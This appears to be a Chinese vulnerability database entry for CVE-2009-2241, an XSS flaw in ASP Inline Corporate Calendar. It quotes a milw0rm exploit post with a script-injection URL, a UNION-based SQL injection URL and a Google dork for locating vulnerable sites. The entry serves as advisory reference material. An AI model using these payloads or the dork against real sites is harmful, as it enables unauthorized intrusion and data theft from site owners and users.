Aaronoutpost ASP Inline Corporate Calendar search.asp跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117816 漏洞类型 跨站脚本
发布时间 2009-05-21 更新时间 2009-06-29
CVE编号 CVE-2009-2241 CNNVD-ID CNNVD-200906-438
漏洞平台 ASP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/8756
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-438
|漏洞详情
ASPInlineCorporateCalendar的search.asp中存在跨站脚本攻击漏洞。远程攻击者可以借助键盘参数,注入任意web脚本或HTML。
|漏洞EXP
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000



[+] Script               : ASP Talk 

[+] Exploit Type         : Multiple Exploits (SQL/CSS)

[+] Google Dork          : intitle:"ASP inline corporate calendar"          inurl:.asp?id=

[+] Contact              : blackbeard-sql A.T hotmail.fr 

--//--> Exploit : 

1)Cross site scripting :

http://[website]/[script]/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All

post = <script>alert('Bl@clbe@rD Is Here');</script>

2) Remote sql injection Exploit :

http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users

[peace xD]

# milw0rm.com [2009-05-21]
|参考资料

来源:XF
名称:aspinline-search-xss(50666)
链接:http://xforce.iss.net/xforce/xfdb/50666
来源:BID
名称:35054
链接:http://www.securityfocus.com/bid/35054
来源:MILW0RM
名称:8756
链接:http://www.milw0rm.com/exploits/8756
来源:SECUNIA
名称:35187
链接:http://secunia.com/advisories/35187